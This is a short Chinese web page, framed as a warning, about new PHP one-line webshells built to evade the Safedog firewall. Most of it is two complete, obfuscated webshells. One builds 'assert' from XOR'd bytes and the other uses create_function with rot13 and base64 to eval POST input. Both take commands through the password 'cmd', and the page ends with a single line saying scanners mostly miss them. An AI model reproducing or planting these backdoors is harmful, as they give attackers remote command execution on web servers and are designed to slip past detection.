去评论
dz插件网

警惕!新型php过狗一句话

哥斯拉
2023/08/05 22:37:00
密码均为cmd
<?php
class GNJF {
    function ACZD() {
        $oYBu = "\xa2" ^ "\xc3";
        $xGlj = "\x38" ^ "\x4b";
        $YMjG = "\xc4" ^ "\xb7";
        $svkg = "\xe5" ^ "\x80";
        $EJWg = "\xc1" ^ "\xb3";
        $ZPhg = "\xcb" ^ "\xbf";
        $NhIV =$oYBu.$xGlj.$YMjG.$svkg.$EJWg.$ZPhg;
        return $NhIV;
    }
    function __destruct(){
        $LbzR=$this->ACZD();
        @$LbzR($this->UR);
    }
}
$gnjf = new GNJF();
@$gnjf->UR = isset($_GET['id'])?base64_decode($_POST['cmd']):$_POST['cmd'];
?>
--------------------
<?php $rnHX=create_function(str_rot13('$').str_rot13('f').str_rot13('b').str_rot13('z').str_rot13('r'),chr(01630-01463).chr(312-194).str_rot13('n').chr(0161544/01033).base64_decode('KA==').chr(01457-01413).base64_decode('cw==').chr(0x152a3/0x30d).base64_decode('bQ==').base64_decode('ZQ==').chr(0x2a4-0x27b).str_rot13(';'));$rnHX(base64_decode('OTY3N'.'zgyO0'.'BldkF'.'sKCRf'.''.chr(0522-0375).str_rot13('R').chr(0xb73f/0x337).str_rot13('G').base64_decode('Vg==').''.''.str_rot13('S').base64_decode('dA==').chr(0x13d2c/0x2fe).str_rot13('o').base64_decode('Vw==').''.'RdKTs'.'yOTAz'.'MzQ2O'.'w=='.''));?>

解决方法:D盾可能查杀,大部分无效,需要手动查杀
进入原文参与互动